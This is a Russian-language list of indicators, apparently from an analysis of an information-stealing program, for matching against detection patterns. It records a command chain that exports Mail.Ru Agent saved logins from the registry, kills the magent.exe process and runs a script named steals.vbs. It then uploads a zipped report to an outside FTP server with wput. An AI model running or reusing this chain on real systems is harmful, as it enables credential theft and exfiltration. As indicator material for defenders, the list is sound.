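Техническая информация
Ниже в исходном порядке перечислены артефакты: запускаемые команды с аргументами, пути к файлам, DNS-запрос и имена классов и заголовков окон. Список путей к файлам частично повторяется; по-видимому, это два разных перечня, заголовки которых в тексте не сохранились. Символами «#» замаскирована часть значений (в FTP-адресе и в имени узла), поэтому такие строки подходят для сопоставления только по шаблону, а не как точные индикаторы.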
- '%TEMP%\wput.exe' %USERNAME%.zip ftp://u3##########hipadel010203@ftp.host.url.ph/Temp/
- '<SYSTEM32>\tasklist.exe'
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\reg.exe' export HKCU\Software\Mail.Ru\Agent\magent_logins3 report\regis.reg
- '<SYSTEM32>\wscript.exe' "%TEMP%\steals.vbs"
- '<SYSTEM32>\taskkill.exe' /f /im magent.exe
- '<SYSTEM32>\attrib.exe' "%APPDATA%\Mra\Update\ver.txt" -s -h
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\report\SystemInfo.txt
- %TEMP%\report\ProcessList.txt
- %TEMP%\pkzip.exe
- %TEMP%\wput.exe
- %TEMP%\steals.vbs
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\Temp\scs2.tmp
- %TEMP%\wput.exe
- %TEMP%\steals.vbs
- %TEMP%\pkzip.exe
- DNS ASK ft#.#ost.url.ph
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c34.c38.420007'
- ClassName: '(null)' WindowName: '(null)'